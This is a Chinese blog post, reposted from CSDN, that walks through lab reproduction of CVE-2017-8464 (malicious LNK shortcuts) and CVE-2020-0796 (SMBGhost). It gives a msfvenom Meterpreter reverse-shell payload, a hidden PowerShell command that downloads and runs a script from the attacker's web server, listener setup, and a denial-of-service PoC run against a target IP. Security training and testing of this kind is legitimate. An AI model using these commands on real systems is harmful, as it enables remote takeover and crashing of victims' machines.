0


两个CVE漏洞复现

CVE-2017-8464 震网三代 漏洞说明:

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危
传播的载体一般是LNK,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。
危害:
被攻击机插入存在攻击Ink的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

利用原理

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒且被远控。

实战利用

在这里插入图片描述
1、启动msf
在这里插入图片描述

2、使用MSF创建一个后门

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.133 lport=4445-f psh-reflection>/var/www/html/link.ps1

在这里插入图片描述

3、在kali下开启apache2

service apache2 start

在这里插入图片描述

4、通过社会学进行快捷方式传播

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.52.133/link.ps1');test.ps1"

在这里插入图片描述

5、 MSF终端配置监听

  use exploit/multi/handler

配置payload

set payload windows/x64/meterpreter/reverse_tcp

输入 : show options 配置payload

set lhost `<当前机器ip>` 设置 LHOST

set lport  `<未被占用的端口>`  设置 LPORT

在这里插入图片描述

6、运行
在这里插入图片描述
7、靶机中运行快捷方式
在这里插入图片描述
8、成功

CVE-2020-0796 漏洞

“永恒之黑”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。

漏洞成因:
CVE-2020-0796 漏洞存在于受影响版本的 Windows 驱动 srv2.sys 中,由于 Windows SMB 更新到 3.1.1 版本增加了对压缩数据的支持,未对用户传输的压缩数据的合法性进行校验。

过程:
使用奇安信的漏洞探测工具
直接在cmd中启动 CVE-2020-0796-Scanner.exe
在这里插入图片描述
使用CVE-2020-0796 蓝屏工具进行攻击

python3 CVE-2020-0796.py `<查询到存在漏洞的IP>`

python3 CVE-2020-0796.py  192.168.3.xxx

在这里插入图片描述
成功截图(我没成功,我是垃圾)
在这里插入图片描述

标签: 安全 web安全

本文转载自: https://blog.csdn.net/qq_44704184/article/details/125780745
版权归原作者 凌晨四点的代码 所有, 如有侵权,请联系我们删除。

“两个CVE漏洞复现”的评论:

还没有评论